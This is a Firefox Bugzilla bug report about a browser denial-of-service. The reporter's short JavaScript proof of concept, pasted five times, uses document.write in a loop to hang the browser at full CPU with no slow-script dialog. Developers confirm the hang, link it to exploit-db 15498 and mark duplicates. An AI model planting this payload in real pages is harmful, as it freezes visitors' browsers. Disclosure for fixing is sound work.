document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

NEW
Unassigned

Status

()

Firefox
General
7 years ago
2 years ago

People

(Reporter: Yusuf Şen, Unassigned)

Tracking

(Depends on: 1 bug, {hang})

unspecified
x86
Windows XP
Points:
---

Firefox Tracking Flags

(blocking2.0 -, status1.9.2 wanted, status1.9.1 wanted)

Details

(Whiteboard: [sg:dos], URL)

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Reproducible: Always

Steps to Reproduce:
1.Ddos Atack
2.
3.
Actual Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Expected Results:  
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
(Reporter)

Comment 1

7 years ago
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
(Reporter)

Updated

7 years ago
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
(Reporter)

Comment 2

7 years ago
http://www.cyber-heaven.tk
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
We probably didn't need 5 copies of the code in-line...

Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
blocking1.9.1: ? → ---
blocking1.9.2: ? → ---
status1.9.1: --- → wanted
status1.9.2: --- → wanted
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
Is 4.0 afflicted?

Updated

7 years ago
Duplicate of this bug: 612365

Updated

7 years ago
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog.
Tested on Linux, WinXP and OSX.  On Linux, the OOM killer kills the process
after ~10 seconds.
Duplicate of this bug: 612597
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking2.0: ? → -

Updated

4 years ago
Duplicate of this bug: 833874

Updated

4 years ago
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Updated

4 years ago
Duplicate of this bug: 771622

Updated

4 years ago
Duplicate of this bug: 744637
You need to log in before you can comment on or make changes to this bug.